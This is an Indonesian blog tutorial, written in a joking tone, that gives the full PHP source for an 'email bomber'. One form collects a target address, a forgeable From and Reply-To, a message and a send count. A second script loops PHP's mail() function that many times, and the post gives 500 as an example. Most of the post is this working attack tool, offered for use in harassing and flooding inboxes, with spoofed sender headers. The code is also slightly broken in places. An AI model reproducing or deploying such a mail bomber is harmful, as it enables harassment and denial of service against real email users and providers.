Bomber mail

Siapa yang udah pernah bikin bom?? Kalo blum pernah, yuk skarang bikin bom…. Tapi ngebom email aja ya, soalnya saya kagak bisa bikin bom beneran. Okey kali ini kita coba bikin mail bomber menggunakan bahasa pemrograman PHP. PHP merupakan salah satu bahasa pemrograman website yang power full, salah satu fungsinya, PHP bisa digunakan sebagai alat untuk mengirim email. Tetapi fungsi tersebut dapat berjalan jika komputernya terdapat program mail server.

Udah pada tahu kan, jika kita mengirim sebuah email, pasti kita akan menekan tombol submit atau yang paling sering diliat diemail-email biasanya pake nama send. Tentu jika kita mengirim mail kita hanya akan mengirim satu email saja yang terkirim, knapa? Karena kita menekan tombol submit atau send nya hanya sekali, lalu gimana jika kita menekannya dua atau tiga kali, pasti yang terkirim dua atau tiga kali bukan, tapi tentu repot amat dong….. tapi jangan kuatir, PHP punya sebuah jurus yang okey punya, bukan jurus kunyuk melempar buah lo… itu sih punyanya wiroe sableng he… salah satu fungsi yang dimiliki PHP yaitu fungsi looping atau fungsi perulangan, dengan menggunakan fungsi ini kita bisa melakukan perulangan yang kita inginkan, nah untuk itu kita kagak perlu lagi klik sent banyak-banyak, capek….

Langsung aja kita buat scrip ngebomail.php

<html>

<head>

<title>Ngebom Email</title>

</head>

<body>

<h1><div align=”center”>Ngebom Email</div></h1>

<br><hr>

<?

echo ” <form method=’post’ action=’ngirimbom.php’>

<table align=center>

<tr>

<td>Untuk :</td>

<td><input type=’text’ name=’recipient’></td>

</tr>

<tr>

<td>Dari :</td>

<td><input type=’text’ name=’from’></td>

</tr>

<tr>

<td>Reply to :</td>

<td><input type=’text’ name=’replyto’></td>

</tr>

<tr>

<td>Judul:</td>

<td><input type=’text’ name=’subject’></td>

</tr>

<tr>

<td>Pesan :</td>

<td>

<textarea name=’message’ rows=20 cols=80></textarea>

</td>

</tr>

<tr>

<td>Banyak Pengiriman :</td>

<td><input type=’text’ name=’number’></td>

</tr>

</table><br><center>

<input type=’submit’ value=’BOM!!!’>

<input type=’reset’ value=’RESET’>

</center>

</form>”;

?>

</body>

</html>

Script ngebommail.php tersebut akan mengirimkan 6 veriabel kefile ngirimbom.php, diantaranya $recepient, $from, $replyto, $subject, $message, dan $number. Ni script ngirim bomnya….

Script ngirimbom.php

<?

echo “<html>

<head><title>Ngirim Bom</title></head>

<body>

“;

$extra = “From: $from\r\nReply-To: $replyto\r\n”;

echo”

<table>

<tr>

<td>Untuk:</td>

<td>$recipient</td>

</tr>

<tr>

<td>Dari:</td>

<td>$from</td>

</tr>

<tr>

<td>Reply-to:</td>

<td>$replyto</td>

</tr>

<tr>

<td>Judul:</td>

<d>$subject</td>

</tr>

<tr>

<td>Pesan:</td>

<td>$message</td>

</tr>

<tr>

<td>Banyak Pengiriman:</td>

<td>$number</td>

</tr>

</table>

<br>Sending”;

for ($i = 0; $i < $number; $i++){

mail ($recipient, $subject, $message, $extra);

}

echo “done</body>

</html>

?>

Dimana sebenarnya format email tu Cuma 4 variabel yaitu untuk, judul, pesan, dan tambahan lainnya,

Tetapi inti dari file tersebut yaitu :

for ($i = 0; $i < $number; $i++){

mail ($recipient, $subject, $message, $extra);

}

Artinya jika $number diisi 500 maka dia akan mengrim email sebanyak 500 kali ketujuannya…, ni contohnya :

2 thoughts on “Bomber mail

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s